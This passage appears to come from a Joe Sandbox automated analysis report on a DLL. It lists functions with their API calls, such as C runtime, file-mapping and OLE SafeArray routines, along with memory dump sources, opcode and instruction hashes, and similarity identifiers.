                                                                      • Opcode Fuzzy Hash: 11a4930c8f3f96d491a2236ccc03daabd75d24e3c8ca38fa35b5fd92a7d510b0
                                                                      • Instruction Fuzzy Hash: 06216DB4208508AFCB06DF58C4409A97BF4EBA67D9F00C1A5E855DF75ACB30E96BCB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F115D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • UnDecorator::UScore.LIBCMT ref: 6F115D40
                                                                      • DName::DName.LIBCMT ref: 6F115D4C
                                                                        • Part of subcall function 6F113B3B: DName::doPchar.LIBCMT ref: 6F113B6C
                                                                      • UnDecorator::getScopedName.LIBCMT ref: 6F115D8B
                                                                      • DName::operator+=.LIBCMT ref: 6F115D95
                                                                      • DName::operator+=.LIBCMT ref: 6F115DA4
                                                                      • DName::operator+=.LIBCMT ref: 6F115DB0
                                                                      • DName::operator+=.LIBCMT ref: 6F115DBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                      • String ID: void
                                                                      • API String ID: 1480779885-3531332078
                                                                      • Opcode ID: d0208e7a4ec11288185a522b5440fcb7ef297a3074c3cd5e1449bd8e1b192471
                                                                      • Instruction ID: a4529da55c420f85038121b1dca426887a86cd29c2e6a4f2f513038bd8b3ece4
                                                                      • Opcode Fuzzy Hash: d0208e7a4ec11288185a522b5440fcb7ef297a3074c3cd5e1449bd8e1b192471
                                                                      • Instruction Fuzzy Hash: 4011C2B0508208AFDB05DB6CC88DBEC7BB09F51384F4041A9D455AB2D4EF30BA66CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0AFC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,F3D820D6), ref: 6F0AFC98
                                                                      • CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,F3D820D6), ref: 6F0AFCAD
                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,F3D820D6), ref: 6F0AFCB7
                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,F3D820D6), ref: 6F0AFCBA
                                                                      • CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,F3D820D6), ref: 6F0AFD01
                                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,F3D820D6), ref: 6F0AFD14
                                                                      • GetLastError.KERNEL32(?,?,00000000,F3D820D6), ref: 6F0AFD2A
                                                                      • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,F3D820D6), ref: 6F0AFD6B
                                                                      • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,F3D820D6), ref: 6F0AFD98
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
                                                                      • String ID:
                                                                      • API String ID: 1303881157-0
                                                                      • Opcode ID: 444ed5ad3db8dd1761eb8096c51c22a4dc0039e051485ca9ef84305c0fcc251e
                                                                      • Instruction ID: 31cf6b472dee9009779b5ee2a01a554db90710fc86b681c1ebe85b456f96737b
                                                                      • Opcode Fuzzy Hash: 444ed5ad3db8dd1761eb8096c51c22a4dc0039e051485ca9ef84305c0fcc251e
                                                                      • Instruction Fuzzy Hash: 955128B5600301ABDB008FB5D884B9A77E9AF49371F148659EC18CF2C7DB76D8418BE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B0CD0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 196COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xinvalid_argumentstd::_$_memmove
                                                                      • String ID: invalid string position$string too long
                                                                      • API String ID: 2168136238-4289949731
                                                                      • Opcode ID: 2870f02b56ecfdfa19daf5bc89453d76de160dcd6d77495947e89e2537de1bf9
                                                                      • Instruction ID: 0bb7ffecc44a12371a6a6dc03b9882d94ae53ec41b17ad0fafda9af9088a65a0
                                                                      • Opcode Fuzzy Hash: 2870f02b56ecfdfa19daf5bc89453d76de160dcd6d77495947e89e2537de1bf9
                                                                      • Instruction Fuzzy Hash: 855181323082049BD724CE5CDA90B5EB3E7EBC9754B609A2EE855C73C4DB72EC518B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BAA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID:
                                                                      • API String ID: 2610073882-0
                                                                      • Opcode ID: 2915fc2b66a6c83754bb0a25f9bb521db5d786690cd2fe1acc092ec9b9235414
                                                                      • Instruction ID: 5dfbfb2415e8f7dd67729fe246485aac23b4f517581675c2756ad3ff2a93924c
                                                                      • Opcode Fuzzy Hash: 2915fc2b66a6c83754bb0a25f9bb521db5d786690cd2fe1acc092ec9b9235414
                                                                      • Instruction Fuzzy Hash: 17C137716087009FC300DF68C884E5AB7E6FFC8304F648A5EF9959B265D736E845CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B9D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0B9DEB
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0B9DFB
                                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F0B9E29
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0B9F25
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0B9FE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                      • String ID: @
                                                                      • API String ID: 3214203402-2766056989
                                                                      • Opcode ID: 61d6676ff9cb281975b0e34fb8df24e43393ddedcc3cd476ff9b5a6f5ddfeb50
                                                                      • Instruction ID: a2a217afc7e5a457da4408614e2f7f88efbc27ee2a49b185ce1a45f0dd2fba9d
                                                                      • Opcode Fuzzy Hash: 61d6676ff9cb281975b0e34fb8df24e43393ddedcc3cd476ff9b5a6f5ddfeb50
                                                                      • Instruction Fuzzy Hash: 95D16A71E0025ACFDB00DFA8C8C0A9DBBF6FF98314F64816DE515AB254D732AA45CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BB300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0BB3EB
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0BB3FB
                                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F0BB429
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0BB525
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BB5E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                      • String ID: @
                                                                      • API String ID: 3214203402-2766056989
                                                                      • Opcode ID: 903090f83da81569152927f514ede4518d124008f6ecf50d4d2776502f961fc7
                                                                      • Instruction ID: 91afff8ece40749f2be9bca45331e266e31d5259f15397fdcdf957b500f06364
                                                                      • Opcode Fuzzy Hash: 903090f83da81569152927f514ede4518d124008f6ecf50d4d2776502f961fc7
                                                                      • Instruction Fuzzy Hash: 21D167B1D042498FDF00DFA8C9C0BADBBF5BF48304F64816EE515AB255D736AA45CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F1144E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+$NameName::
                                                                      • String ID: throw(
                                                                      • API String ID: 168861036-3159766648
                                                                      • Opcode ID: f1894c040417e5a07cc6fefbc9d84127e6b3a5f3a7eda763ec815d9c96f066b0
                                                                      • Instruction ID: 0aa8a94f4f85f22e51f33e46d9804a34736f5faed8752d5b7b7ace8f95547a9c
                                                                      • Opcode Fuzzy Hash: f1894c040417e5a07cc6fefbc9d84127e6b3a5f3a7eda763ec815d9c96f066b0
                                                                      • Instruction Fuzzy Hash: 6A019274604209AFCF04DBA4D856DEE7BB9EB85788F404165E9019B2D4EB30F9668B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F10E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6F139880,00000008,6F10EAC1,00000000,00000000,?,?,6F10D7DD,6F109DEF,00000000,?,6F109BD4,6F0A1290,F3D820D6), ref: 6F10E9CA
                                                                      • __lock.LIBCMT ref: 6F10E9FE
                                                                        • Part of subcall function 6F112438: __mtinitlocknum.LIBCMT ref: 6F11244E
                                                                        • Part of subcall function 6F112438: __amsg_exit.LIBCMT ref: 6F11245A
                                                                        • Part of subcall function 6F112438: EnterCriticalSection.KERNEL32(6F109BD4,6F109BD4,?,6F10EA03,0000000D), ref: 6F112462
                                                                      • InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6F10EA0B
                                                                      • __lock.LIBCMT ref: 6F10EA1F
                                                                      • ___addlocaleref.LIBCMT ref: 6F10EA3D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                      • String ID: KERNEL32.DLL
                                                                      • API String ID: 637971194-2576044830
                                                                      • Opcode ID: 8d09bb6111e763796ed605ec2a5fcf772713336a6ec3eff7c8d8b39ce050efa1
                                                                      • Instruction ID: c3fe3b5b03e9a0a245153d7ed3828346c59b2410c644d2f047337372fbce9fd5
                                                                      • Opcode Fuzzy Hash: 8d09bb6111e763796ed605ec2a5fcf772713336a6ec3eff7c8d8b39ce050efa1
                                                                      • Instruction Fuzzy Hash: F6015E71444B04DFD720AFA6D404749BBE0BF553A4F50891DD89A966D0CF70A664CB15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B7370 Relevance: 9.1, APIs: 6, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6F1211FD,000000FF,?,6F0B8B80,00000000,?,00000000,?,6F0B8C13,?,?), ref: 6F0B7415
                                                                      • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6F1211FD,000000FF,?,6F0B8B80,00000000,?,00000000,?,6F0B8C13,?,?), ref: 6F0B741B
                                                                      • std::exception::exception.LIBCMT ref: 6F0B743D
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0B7452
                                                                      • std::exception::exception.LIBCMT ref: 6F0B7461
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0B7476
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C04
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C1E
                                                                        • Part of subcall function 6F109BB5: __CxxThrowException@8.LIBCMT ref: 6F109C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
                                                                      • String ID:
                                                                      • API String ID: 189561132-0
                                                                      • Opcode ID: 6064ae2f15fbb5fa4a1724238934aa5098b579eee3edf6cc5532c74175da9f23
                                                                      • Instruction ID: a42b51ad2603232e7f11a5b3bcac73818c7202bc3f7cb3968b0ef14daa4d6c1a
                                                                      • Opcode Fuzzy Hash: 6064ae2f15fbb5fa4a1724238934aa5098b579eee3edf6cc5532c74175da9f23
                                                                      • Instruction Fuzzy Hash: 504149B2900748AFC711DF99C890A9AFBF8FB59250F40866EE81697B40D771F914CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CC150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0CC180
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,6F0C3749,?), ref: 6F0CC1B8
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CC1C4
                                                                      • VariantCopy.OLEAUT32(6F0C3749,?), ref: 6F0CC21B
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CC22F
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0CC23E
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
                                                                      • String ID:
                                                                      • API String ID: 3979206172-0
                                                                      • Opcode ID: e11958d189ab893f55c922e606a7b3750613352fbe34d8ac52befa2f1c31b55e
                                                                      • Instruction ID: 95e2ac23cbf64ba04da10f5ccba42a43a058d6c54a9cf2a3ead02313e08ef8af
                                                                      • Opcode Fuzzy Hash: e11958d189ab893f55c922e606a7b3750613352fbe34d8ac52befa2f1c31b55e
                                                                      • Instruction Fuzzy Hash: AA316C71A00649AFDB00DFE9C894B9EBBB8FF49350F108129E915D7350EB31E941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F11249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6F1125B1,?,00000000,?), ref: 6F1124E6
                                                                      • _malloc.LIBCMT ref: 6F11251B
                                                                      • _memset.LIBCMT ref: 6F11253B
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6F112550
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F11255E
                                                                      • __freea.LIBCMT ref: 6F112568
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                                      • String ID:
                                                                      • API String ID: 525495869-0
                                                                      • Opcode ID: b9b70a34b99b6ac8d89036a59022d62c84998152c4717d838dde7678a78a6916
                                                                      • Instruction ID: 625b89b98c4cb4c7a27536d1e0ede3b828cb3b4f8b06d26a3e8f4901c9efcba8
                                                                      • Opcode Fuzzy Hash: b9b70a34b99b6ac8d89036a59022d62c84998152c4717d838dde7678a78a6916
                                                                      • Instruction Fuzzy Hash: 05315E71604249AFEB01DF64DCD0DEE7BA9EB5A394F110436F91496290EB34E9709F60
                                                                      Uniqueness

